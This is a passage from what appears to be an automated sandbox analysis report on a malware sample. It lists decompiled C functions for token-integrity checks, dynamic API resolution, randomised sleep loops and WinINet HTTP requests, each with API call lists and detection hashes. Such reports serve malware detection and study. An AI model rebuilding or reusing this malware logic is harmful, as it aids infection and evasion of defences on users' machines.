                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 022B590E
                                                                                                                                  • InternetSetStatusCallback.WININET(?,00000000), ref: 022B5919
                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 022B591E
                                                                                                                                  • InternetSetStatusCallback.WININET(?,00000000), ref: 022B5929
                                                                                                                                  • InternetCloseHandle.WININET(?), ref: 022B592E
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000102,?,?,022B93DC,?,?,00000000,00000000,74E481D0), ref: 022B593E
                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,00000102,?,?,022B93DC,?,?,00000000,00000000,74E481D0), ref: 022B5948
                                                                                                                                    • Part of subcall function 022B29C0: WaitForMultipleObjects.KERNEL32(00000002,022BA923,00000000,022BA923,?,?,?,022BA923,0000EA60), ref: 022B29DB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2824497044-0
                                                                                                                                  • Opcode ID: e7be2ea3d7265fb9929441b00f084e8abd852077a153819119520ed4b193279c
                                                                                                                                  • Instruction ID: 5993516b1b311dfa83d40b052c6cd219de925e890faf9ab5020007b2f6ce1504
                                                                                                                                  • Opcode Fuzzy Hash: e7be2ea3d7265fb9929441b00f084e8abd852077a153819119520ed4b193279c
                                                                                                                                  • Instruction Fuzzy Hash: 68117276620B496BC632AFFAEC84C9BF7EDFF483A43950D18E086D7514C721F8548A60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022BA2C6(long* _a4) {
                                                                                                                                  				long _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				int _t33;
                                                                                                                                  				void* _t46;
                                                                                                                                  
                                                                                                                                  				_v16 = 1;
                                                                                                                                  				_v20 = 0x2000;
                                                                                                                                  				if( *0x22bd25c > 5) {
                                                                                                                                  					_v16 = 0;
                                                                                                                                  					if(OpenProcessToken(0xffffffff, ?str?,  &_v12) != 0) {
                                                                                                                                  						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                  						_v8 = 0;
                                                                                                                                  						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                  						if(_v8 != 0) {
                                                                                                                                  							_t46 = E022B1525(_v8);
                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                  								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                  								if(_t33 != 0) {
                                                                                                                                  									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                  								}
                                                                                                                                  								E022B8B22(_t46);
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						CloseHandle(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				 *_a4 = _v20;
                                                                                                                                  				return _v16;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 022BA2F8
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 022BA318
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 022BA328
                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 022BA378
                                                                                                                                    • Part of subcall function 022B1525: RtlAllocateHeap.NTDLL(00000000,00000000,022B1278), ref: 022B1531
                                                                                                                                  • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 022BA34B
                                                                                                                                  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 022BA353
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 022BA363
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1295030180-0
                                                                                                                                  • Opcode ID: 0e0020e9cc12ca1172b4303b591345295197f1c88132d4bb32f211b79b09fbaa
                                                                                                                                  • Instruction ID: 2f8282535580927eb7538fd8d4706bba38ea662d77e88c8221692acf618a142d
                                                                                                                                  • Opcode Fuzzy Hash: 0e0020e9cc12ca1172b4303b591345295197f1c88132d4bb32f211b79b09fbaa
                                                                                                                                  • Instruction Fuzzy Hash: C6215975D00209FFEB029FE4DC88EEEBBB9EF08344F0004A5E910A6260D7719A15EF60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401046
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401072
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401088
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040109E
                                                                                                                                    • Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
                                                                                                                                    • Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                  • Opcode ID: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
                                                                                                                                  • Instruction ID: 703f11fa8a27d996fe27e145a0f2623f1ccbe29c67bd5c4830df0f77db47329d
                                                                                                                                  • Opcode Fuzzy Hash: 4bf58f2c9000e010b34dfb3cc311ad0f84d7dfccd87215c1a1d7e78e2faa945c
                                                                                                                                  • Instruction Fuzzy Hash: 3F3189B060168A9FD710CF6ACD8486BBBFCEF54344700447AE649EB661EB74EA018F24
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00401000(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				_Unknown_base(*)()* _t29;
                                                                                                                                  				_Unknown_base(*)()* _t33;
                                                                                                                                  				_Unknown_base(*)()* _t36;
                                                                                                                                  				_Unknown_base(*)()* _t39;
                                                                                                                                  				_Unknown_base(*)()* _t42;
                                                                                                                                  				intOrPtr _t46;
                                                                                                                                  				struct HINSTANCE__* _t50;
                                                                                                                                  				intOrPtr _t56;
                                                                                                                                  
                                                                                                                                  				_t56 = E004016EE(0x20);
                                                                                                                                  				if(_t56 == 0) {
                                                                                                                                  					_v8 = 8;
                                                                                                                                  				} else {
                                                                                                                                  					_t50 = GetModuleHandleA( *0x403104 + 0x404014);
                                                                                                                                  					_v8 = 0x7f;
                                                                                                                                  					_t29 = GetProcAddress(_t50,  *0x403104 + 0x404151);
                                                                                                                                  					 *(_t56 + 0xc) = _t29;
                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                  						L8:
                                                                                                                                  						E004017CB(_t56);
                                                                                                                                  					} else {
                                                                                                                                  						_t33 = GetProcAddress(_t50,  *0x403104 + 0x404161);
                                                                                                                                  						 *(_t56 + 0x10) = _t33;
                                                                                                                                  						if(_t33 == 0) {
                                                                                                                                  							goto L8;
                                                                                                                                  						} else {
                                                                                                                                  							_t36 = GetProcAddress(_t50,  *0x403104 + 0x404174);
                                                                                                                                  							 *(_t56 + 0x14) = _t36;
                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                  								goto L8;
                                                                                                                                  							} else {
                                                                                                                                  								_t39 = GetProcAddress(_t50,  *0x403104 + 0x404189);
                                                                                                                                  								 *(_t56 + 0x18) = _t39;
                                                                                                                                  								if(_t39 == 0) {
                                                                                                                                  									goto L8;
                                                                                                                                  								} else {
                                                                                                                                  									_t42 = GetProcAddress(_t50,  *0x403104 + 0x40419f);
                                                                                                                                  									 *(_t56 + 0x1c) = _t42;
                                                                                                                                  									if(_t42 == 0) {
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										 *((intOrPtr*)(_t56 + 8)) = _a8;
                                                                                                                                  										 *((intOrPtr*)(_t56 + 4)) = _a4;
                                                                                                                                  										_t46 = E00401C90(_t56, _a12); // executed
                                                                                                                                  										_v8 = _t46;
                                                                                                                                  										if(_t46 != 0) {
                                                                                                                                  											goto L8;
                                                                                                                                  										} else {
                                                                                                                                  											 *_a16 = _t56;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _v8;
                                                                                                                                  			}













                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004016EE: HeapAlloc.KERNEL32(00000000,?,004019CF,00000030,?,00000000), ref: 004016FA
                                                                                                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401DBA,?,?,?,?,?,00000002,?,?), ref: 00401024
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401046
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040105C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401072
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401088
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040109E
                                                                                                                                    • Part of subcall function 00401C90: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 00401CED
                                                                                                                                    • Part of subcall function 00401C90: memset.NTDLL ref: 00401D0F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558314873.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558324850.0000000000404000.00000040.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.558336689.0000000000406000.00000040.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1632424568-0
                                                                                                                                  • Opcode ID: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
                                                                                                                                  • Instruction ID: 9140f5516d8f6e96bc42ac16d424ff358ba4bbc2604748eb03e792c2eb0f4ca6
                                                                                                                                  • Opcode Fuzzy Hash: b071192780d30fa37d270c9a6f49c8fb865145641f62670ffd03f1ccc65f9e0a
                                                                                                                                  • Instruction Fuzzy Hash: 0F21BBB060064AAFD710DF6ACD84D6BBBFCEF54344700043AE649EB260DB74EA018F28
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 74%
                                                                                                                                  			E022B2789(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                  				struct _FILETIME _v12;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t12;
                                                                                                                                  				int _t14;
                                                                                                                                  				signed int _t16;
                                                                                                                                  				void* _t18;
                                                                                                                                  				signed int _t19;
                                                                                                                                  				unsigned int _t23;
                                                                                                                                  				void* _t27;
                                                                                                                                  				signed int _t34;
                                                                                                                                  
                                                                                                                                  				_t27 = __edx;
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_t10 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                  				 *0x22bd238 = _t10;
                                                                                                                                  				if(_t10 != 0) {
                                                                                                                                  					 *0x22bd1a8 = GetTickCount();
                                                                                                                                  					_t12 = E022B9EBB(_a4);
                                                                                                                                  					if(_t12 == 0) {
                                                                                                                                  						do {
                                                                                                                                  							GetSystemTimeAsFileTime( &_v12);
                                                                                                                                  							_t14 = SwitchToThread();
                                                                                                                                  							_t23 = _v12.dwHighDateTime;
                                                                                                                                  							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
                                                                                                                                  							_push(0);
                                                                                                                                  							_push(0x13);
                                                                                                                                  							_push(_t23 >> 5);
                                                                                                                                  							_push(_t16);
                                                                                                                                  							L022BB0CA();
                                                                                                                                  							_t34 = _t14 + _t16;
                                                                                                                                  							_t18 = E022B122B(_a4, _t34);
                                                                                                                                  							_t19 = 3;
                                                                                                                                  							_t26 = _t34 & 0x00000007;
                                                                                                                                  							Sleep(_t19 << (_t34 & 0x00000007)); // executed
                                                                                                                                  						} while (_t18 == 1);
                                                                                                                                  						if(E022B4D4D(_t26) != 0) {
                                                                                                                                  							 *0x22bd260 = 1; // executed
                                                                                                                                  						}
                                                                                                                                  						_t12 = E022B2F70(_t27); // executed
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					_t12 = 8;
                                                                                                                                  				}
                                                                                                                                  				return _t12;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B279C
                                                                                                                                  • GetTickCount.KERNEL32 ref: 022B27B0
                                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,022B7F25,?), ref: 022B27CC
                                                                                                                                  • SwitchToThread.KERNEL32(?,00000001,?,?,?,022B7F25,?), ref: 022B27D2
                                                                                                                                  • _aullrem.NTDLL(?,?,00000013,00000000), ref: 022B27EF
                                                                                                                                  • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,022B7F25,?), ref: 022B280C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 507476733-0
                                                                                                                                  • Opcode ID: d64313dbd1fa6027446bec34e58ca2ed327a7e5320a6ebd6adb743c65b3bc95b
                                                                                                                                  • Instruction ID: be1a9ebba26545cb22cf52fe1cf9e7b3d09433ded51a970e083f12ba24794f49
                                                                                                                                  • Opcode Fuzzy Hash: d64313dbd1fa6027446bec34e58ca2ed327a7e5320a6ebd6adb743c65b3bc95b
                                                                                                                                  • Instruction Fuzzy Hash: 9811C672EA0301AFE7166BF4EC5DBDA3699DF44390F004A29FD55C6294EBB0D850CA64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E022B97F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				void* __esi;
                                                                                                                                  				long _t10;
                                                                                                                                  				void* _t18;
                                                                                                                                  				void* _t22;
                                                                                                                                  
                                                                                                                                  				_t9 = __eax;
                                                                                                                                  				_t22 = __eax;
                                                                                                                                  				if(_a4 != 0 && E022B8CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                                                                                                  					L9:
                                                                                                                                  					return GetLastError();
                                                                                                                                  				}
                                                                                                                                  				_t10 = E022BA85C(_t9, _t18, _t22, _a8); // executed
                                                                                                                                  				if(_t10 == 0) {
                                                                                                                                  					ResetEvent( *(_t22 + 0x1c));
                                                                                                                                  					ResetEvent( *(_t22 + 0x20));
                                                                                                                                  					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                                                                                                                  						SetEvent( *(_t22 + 0x1c));
                                                                                                                                  						goto L7;
                                                                                                                                  					} else {
                                                                                                                                  						_t10 = GetLastError();
                                                                                                                                  						if(_t10 == 0x3e5) {
                                                                                                                                  							L7:
                                                                                                                                  							_t10 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				if(_t10 == 0xffffffff) {
                                                                                                                                  					goto L9;
                                                                                                                                  				}
                                                                                                                                  				return _t10;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • ResetEvent.KERNEL32(?,00000008,?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022B9831
                                                                                                                                  • ResetEvent.KERNEL32(?), ref: 022B9836
                                                                                                                                  • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 022B9843
                                                                                                                                  • GetLastError.KERNEL32 ref: 022B984E
                                                                                                                                  • GetLastError.KERNEL32(?,?,00000102,022B937B,?,?,00000000,00000000), ref: 022B9869
                                                                                                                                    • Part of subcall function 022B8CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,022B9816,?,?,?,?,00000102,022B937B,?,?,00000000), ref: 022B8D06
                                                                                                                                    • Part of subcall function 022B8CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,022B9816,?,?,?,?,00000102,022B937B,?), ref: 022B8D64
                                                                                                                                    • Part of subcall function 022B8CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 022B8D74
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 022B985C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3739416942-0
                                                                                                                                  • Opcode ID: 67fc124ddf4098b597bdef206d1312979c58800e34838f3cb245243d14143a9f
                                                                                                                                  • Instruction ID: 528cd7147805c3714249dd729d6fb18e265b31af4bea19d8305721369ac705bf
                                                                                                                                  • Opcode Fuzzy Hash: 67fc124ddf4098b597bdef206d1312979c58800e34838f3cb245243d14143a9f
                                                                                                                                  • Instruction Fuzzy Hash: D001AD31120302AFDF336BF2EC48F9BB6A9AF483A8F500A25F655950E4D721D894DE61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 50%
                                                                                                                                  			E022B1128(void** __esi) {
                                                                                                                                  				intOrPtr _v0;
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				intOrPtr _t6;
                                                                                                                                  				void* _t8;
                                                                                                                                  				void* _t9;
                                                                                                                                  				intOrPtr _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void** _t13;
                                                                                                                                  
                                                                                                                                  				_t13 = __esi;
                                                                                                                                  				_t4 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				__imp__(_t4 + 0x40);
                                                                                                                                  				while(1) {
                                                                                                                                  					_t6 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                  					if( *_t1 == 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					Sleep(0xa);
                                                                                                                                  				}
                                                                                                                                  				_t8 =  *_t13;
                                                                                                                                  				if(_t8 != 0 && _t8 != 0x22bd030) {
                                                                                                                                  					HeapFree( *0x22bd238, 0, _t8);
                                                                                                                                  				}
                                                                                                                                  				_t9 = E022B4A2A(_v0, _t13); // executed
                                                                                                                                  				_t13[1] = _t9;
                                                                                                                                  				_t10 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  				_t11 = _t10 + 0x40;
                                                                                                                                  				__imp__(_t11);
                                                                                                                                  				return _t11;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • RtlEnterCriticalSection.NTDLL(04779570), ref: 022B1131
                                                                                                                                  • Sleep.KERNEL32(0000000A,?,022B30F3), ref: 022B113B
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,022B30F3), ref: 022B1163
                                                                                                                                  • RtlLeaveCriticalSection.NTDLL(04779570), ref: 022B117F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558902980.00000000022B1000.00000020.00020000.sdmp, Offset: 022B0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.558896368.00000000022B0000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559009578.00000000022BC000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559020732.00000000022BD000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000000.00000002.559039068.00000000022BF000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 58946197-8415677
                                                                                                                                  • Opcode ID: 8980a8f6d9b4d8a4c1ab6b04a61384a278c2f852208fc23d55bf1108d2e65c17
                                                                                                                                  • Instruction ID: c455ea1116a6d3eb39454fc8b8830ae4181b4e635b4a4c09f7fae880bc976fff
                                                                                                                                  • Opcode Fuzzy Hash: 8980a8f6d9b4d8a4c1ab6b04a61384a278c2f852208fc23d55bf1108d2e65c17
                                                                                                                                  • Instruction Fuzzy Hash: C2F05E30A642419FD7139FE4F85CF967BE8AF04380B048C05F545CA269C320E870CF14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.558355607.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$CheckMemory__heap_alloc_base
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4254127243-0
                                                                                                                                  • Opcode ID: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
                                                                                                                                  • Instruction ID: 883977096d5b4a7fe5b6a7c637ebf55110fbed55347a43cd2ef017c13511578a
                                                                                                                                  • Opcode Fuzzy Hash: 0ed41d0a78ef98ae619d4450501c923431563c3941c69cd1aca692f4135d9167
                                                                                                                                  • Instruction Fuzzy Hash: 06B1AC74A00205DBDB18DF44DD95BEA77F1AB48304F20816AE9196B3D1C379AE81CFAD
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                  			E022B2F70(signed int __edx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				CHAR* _v16;
                                                                                                                                  				long _v20;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* __esi;
                                                                                                                                  				void* _t21;
                                                                                                                                  				CHAR* _t22;
                                                                                                                                  				CHAR* _t25;
                                                                                                                                  				intOrPtr _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  				void* _t31;
                                                                                                                                  				void* _t32;
                                                                                                                                  				CHAR* _t36;
                                                                                                                                  				CHAR* _t42;
                                                                                                                                  				CHAR* _t43;
                                                                                                                                  				CHAR* _t44;
                                                                                                                                  				void* _t49;
                                                                                                                                  				void* _t51;
                                                                                                                                  				CHAR* _t54;
                                                                                                                                  				signed char _t56;
                                                                                                                                  				intOrPtr _t58;
                                                                                                                                  				signed int _t59;
                                                                                                                                  				void* _t62;
                                                                                                                                  				CHAR* _t65;
                                                                                                                                  				CHAR* _t66;
                                                                                                                                  				char* _t67;
                                                                                                                                  				void* _t68;
                                                                                                                                  
                                                                                                                                  				_t61 = __edx;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v8 = 0;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_t21 = E022B59A4();
                                                                                                                                  				if(_t21 != 0) {
                                                                                                                                  					_t59 =  *0x22bd25c; // 0x2000000a
                                                                                                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  					 *0x22bd25c = (_t59 & 0xf0000000) + _t21;
                                                                                                                                  				}
                                                                                                                                  				_t22 =  *0x22bd160(0, 2); // executed
                                                                                                                                  				_v16 = _t22;
                                                                                                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                  					_t25 = E022B2B6F( &_v8,  &_v20); // executed
                                                                                                                                  					_t54 = _t25;
                                                                                                                                  					_t26 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  					if( *0x22bd25c > 5) {
                                                                                                                                  						_t8 = _t26 + 0x22be5cd; // 0x4d283a53
                                                                                                                                  						_t27 = _t8;
                                                                                                                                  					} else {
                                                                                                                                  						_t7 = _t26 + 0x22be9f5; // 0x44283a44
                                                                                                                                  						_t27 = _t7;
                                                                                                                                  					}
                                                                                                                                  					E022B9154(_t27, _t27);
                                                                                                                                  					_t31 = E022B8E0D(_t61,  &_v20,  &_v12); // executed
                                                                                                                                  					if(_t31 == 0) {
                                                                                                                                  						CloseHandle(_v20);
                                                                                                                                  					}
                                                                                                                                  					_t62 = 5;
                                                                                                                                  					if(_t54 != _t62) {
                                                                                                                                  						 *0x22bd270 =  *0x22bd270 ^ 0x81bbe65d;
                                                                                                                                  						_t32 = E022B1525(0x60);
                                                                                                                                  						 *0x22bd32c = _t32;
                                                                                                                                  						__eflags = _t32;
                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                  							_push(8);
                                                                                                                                  							_pop(0);
                                                                                                                                  						} else {
                                                                                                                                  							memset(_t32, 0, 0x60);
                                                                                                                                  							_t49 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  							_t68 = _t68 + 0xc;
                                                                                                                                  							__imp__(_t49 + 0x40);
                                                                                                                                  							_t51 =  *0x22bd32c; // 0x47795b0
                                                                                                                                  							 *_t51 = 0x22be81a;
                                                                                                                                  						}
                                                                                                                                  						_t54 = 0;
                                                                                                                                  						__eflags = 0;
                                                                                                                                  						if(0 == 0) {
                                                                                                                                  							_t36 = RtlAllocateHeap( *0x22bd238, 0, 0x43);
                                                                                                                                  							 *0x22bd2c8 = _t36;
                                                                                                                                  							__eflags = _t36;
                                                                                                                                  							if(_t36 == 0) {
                                                                                                                                  								_push(8);
                                                                                                                                  								_pop(0);
                                                                                                                                  							} else {
                                                                                                                                  								_t56 =  *0x22bd25c; // 0x2000000a
                                                                                                                                  								_t61 = _t56 & 0x000000ff;
                                                                                                                                  								_t58 =  *0x22bd2a8; // 0x24ba5a8
                                                                                                                                  								_t13 = _t58 + 0x22be55a; // 0x697a6f4d
                                                                                                                                  								_t55 = _t13;
                                                                                                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x22bc287);
                                                                                                                                  							}
                                                                                                                                  							_t54 = 0;
                                                                                                                                  							__eflags = 0;
                                                                                                                                  							if(0 == 0) {
                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                  								E022B7A2E( ~_v8 &  *0x22bd270, 0x22bd00c); // executed
                                                                                                                                  								_t42 = E022B7FBE(_t55); // executed
                                                                                                                                  								_t54 = _t42;
                                                                                                                                  								__eflags = _t54;
                                                                                                                                  								if(_t54 != 0) {
                                                                                                                                  									goto L30;
                                                                                                                                  								}
